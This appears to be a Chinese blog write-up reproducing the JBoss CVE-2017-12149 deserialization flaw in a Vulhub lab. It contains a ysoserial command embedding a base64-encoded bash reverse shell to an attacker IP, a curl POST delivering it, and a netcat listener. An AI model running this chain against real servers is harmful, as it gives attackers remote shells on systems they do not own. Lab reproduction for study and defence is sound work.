JBoss 5.x/6.x 反序列化漏洞（CVE-2017-12149）

该漏洞为Java反序列化错误类型，存在于Jboss的HttpInvOKER隔离器中，该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化，从而导致了漏洞。

漏洞复现

该漏洞出现在/invoker/readonly请求中，服务器将用户提交的POST内容进行了Java反序列化：

cd jboss/CVE-2017-12149
docker-compose up -d
docker-compose config

编写反弹shell命令
使用bash来反弹shell，但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法，我们需要用进行一次编码。编码地址

序列化数据生成

使用ysoserial来复现生成序列化数据，由于Vulhub使用的Java版本较新，所以选择使用的gadget是CommonsCollections5：

java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMjgvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser

发送POC

生成好的POC即为poc.ser，将这个文件作为POST Body发送至/invoker/readonly即可：
使用curl命令，将我们的序列化数据以POST的形式发送。

curl http://10.10.10.10:8080/invoker/readonly --data-binary @poc.ser

监听端口

nc -lvnp 4444

成功反弹shell

本栏目推荐文章
• OFBiz RCE漏洞复现（CVE-2023-51467）
• CVE-2023-34050 Spring AMQP Deserialization Vulnerability
• CVE-2020-11800
• P8649 [蓝桥杯 2017 省 B] k 倍区间
• ActiveMQ RCE CVE-2023-46604分析
• CVE-2023-36025 Windows SmartScreen 安全功能绕过漏洞
• P3823 [NOI2017] 蚯蚓排队
• P4657 [CEOI2017] Chase 题解
• NGINX文件名漏洞(CVE-2013-4547)
• ZJOI 2017 树状数组

12149 2017 CVE12149 2017 cve 2017 7504 cve 漏洞2017 7921 cve 漏洞2017 6920 cve 10271 2017 cve weblogic 10271 2017 cve dnstracer 2017 9430 cve cve 2017 apache-httpd漏洞 命令cve 2017 h2database 12149